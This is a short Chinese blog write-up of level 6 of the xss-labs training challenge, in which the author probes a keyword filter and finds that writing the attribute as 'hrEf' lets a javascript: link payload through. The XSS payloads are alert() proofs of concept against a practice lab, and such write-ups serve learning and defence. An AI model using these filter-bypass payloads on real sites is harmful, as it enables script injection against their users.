level6

木樨点点

 关注

阅读 40

2022-02-10

 经过判断,发现没过滤 < > "  但是有些关键词和 ' 不能用了,大致判断和第五题一样,换一个标签

"> <a href=javascript:alert('xss') > xss</a> //

 也不行了,过滤了href

 

onfocus,onblur,onkeydown,action也被过滤了 (on被过滤了)

src也被过滤了

"><table background=javascript:alert(1)></table> //

这个没被过滤,但是好像也没什么用

尝试很多次之后,发现可以用大小写绕过

"> <a hrEf=javascript:alert('xss') > xss</a> //

 

相关推荐

jarvisoj_level6_x64

书坊尚 29 0 0

6、使用Java Low Level REST Client操作elasticsearch.docx

生命中最美的是成长 97 0 0

知识蒸馏论文翻译(6)——FEED: Feature-level Ensemble for Knowledge Distillation

吴wuwu 73 0 0

xss-labs:level1-level10

Mhhao 71 0 0

IDEA报错Target Level '1.5' Is Incompatible With Source Level '1.8'

Ad大成 60 0 0

mysql log level

Ad大成 11 0 0

ZOJ 1167 Trees on the Level

夜空一星 202 0 0

mysql page-level

small_Sun 97 0 0

C level人才招聘

北溟有渔夫 12 0 0

PAT (Basic Level) Practice

醉东枫 39 0 0

精彩评论(0)

0 0 举报